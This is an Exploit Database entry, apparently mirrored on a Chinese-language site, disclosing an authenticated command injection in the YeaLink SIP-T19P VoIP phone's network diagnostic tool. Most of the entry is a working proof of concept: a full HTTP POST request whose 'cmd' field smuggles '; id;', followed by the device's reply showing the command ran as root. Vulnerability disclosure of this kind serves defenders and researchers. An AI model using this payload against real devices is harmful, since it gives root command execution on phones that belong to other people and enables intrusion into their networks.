YeaLink SIP-TXXXP 53.84.0.15 – ‘cmd’ Command Injection (Authenticated)

• Exploit Database
• 57 阅读

• 作者： tahaafarooq
  日期： 2021-11-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50509/

• # Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
  # Date: 11-10-2021
  # Exploit Author: tahaafarooq
  # Vendor Homepage: https://www.yealink.com/
  # Version: 53.84.0.15
  # Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
  
  Description: 
  
  Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
  
  POC:
  
  POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
  Host: xxx.xxx.xxx.xxx
  Content-Length: 49
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Origin: http://xxx.xxx.xxx.xxx
  Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: JSESSIONID=9a83d24461329a130
  Connection: close
  
  cmd=; id;&token=1714636915c6acea98
  
  -------------------------------------------------
  
  HTTP/1.1 200 OK
  Content-Type: text/html
  Connection: close
  Date: Wed, 10 Nov 2021 14:20:23 GMT
  Server: embed httpd
  Content-Length: 82
  
  <html>
  <body>
  	<div id="_RES_INFO_">
  uid=0(root) gid=0(root)
  </div>
  </body>
  </html>